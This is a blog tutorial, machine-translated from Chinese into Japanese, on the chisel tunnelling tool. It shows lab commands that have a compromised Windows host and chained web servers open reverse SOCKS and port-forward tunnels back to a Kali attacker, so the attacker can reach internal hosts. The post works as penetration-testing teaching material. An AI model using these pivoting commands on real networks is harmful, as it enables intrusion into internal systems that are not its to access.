banner
lca

lca

真正的不自由,是在自己的心中设下牢笼。
ホームアーカイブ图文

chisel代理ツール

#代理242
AI 翻訳
この記事はAIを通じて中国語から日本語に翻訳されました。原文を表示
AI が生成した要約
chisel是一款基于HTTP的快速TCP/UDP隧道工具,使用SSH加密,具有断开等待和重连机制,支持多平台,无依赖。攻击者(kali)可以通过chisel访问受害者(windows)和内部服务器。可以设置一级代理和访问特定端口,也可以使用socks代理。详细操作步骤可参考项目地址和视频。

chisel は、HTTP ベースの高速な TCP/UDP トンネリングツールです。

プロジェクトのリンク:https://github.com/jpillora/chisel/releases

利点:SSH 暗号化を使用し、セキュリティが向上しています。切断待機と再接続メカニズムを備えており、安定性が高いです(ew と同様に、長時間操作しないと切断されます)。Go 言語で書かれており、マルチプラットフォームをサポートしています。単一の依存関係のないファイルです。

攻撃者(kali): 192.168.6.131
被害者(windows): 192.168.6.129

トポロジーは以下の通りです:

攻撃者(192.168.6.131)<--> 被害者(192.168.6.129,10.1.1.1)< -- > 内部サーバー (10.1.1.2)

目標アクセス: 10.1.1.2

一次プロキシ#

フォワード接続(socks)

ジャンプホスト(被害者)

./chisel server -p 12345

image

攻撃者

./chisel client 192.168.6.129:12345 socks

image

socks プロキシはポート 1080 にバインドされており、ローカルで socks5 プロキシを設定するだけでアクセスできます。

リバース接続

攻撃者(ハッカー)

./chisel server -p 12345 --reverse --socks5

ジャンプホスト(被害者)

chisel.exe client 192.168.6.128:12345 R:socks

image

攻撃者(ハッカー)は 10.1.1.2 にアクセスできます。

image

二次プロキシ#

image

特定のポートへのアクセス#

kali:

chisel  server -p 3333 --reverse

web01:

クライアントとサーバーの両方を実行するために、2 つのターミナルを開きます。

chisel server -p 2222 --reverse

chisel client 192.168.126.132:3333 R:1111:127.0.0.1:5555

web02:

chisel client 192.168.150.128:2222 R:5555:192.168.59.129:80

kali で 127.0.0.1:1111 にアクセスすると、192.168.59.129 の 80 ポートにアクセスできます。

socks プロキシ#

kali:

chisel server -p 3333 --reverse

web01:

クライアントとサーバーの両方を実行するために、2 つのターミナルを開きます。

chisel server -p 2222 --reverse --socks5

chisel client 192.168.126.132:3333 R:1111:socks

web02:

chisel client 192.168.150.128:2222 R:5555:socks

proxychains.conf ファイルでプロキシチェーンを設定

socks5 127.0.0.1 1111
socks5 127.0.0.1 5555

参考:https://youtu.be/srUUUkcYEwg

読み込み中...
文章は、創作者によって署名され、ブロックチェーンに安全に保存されています。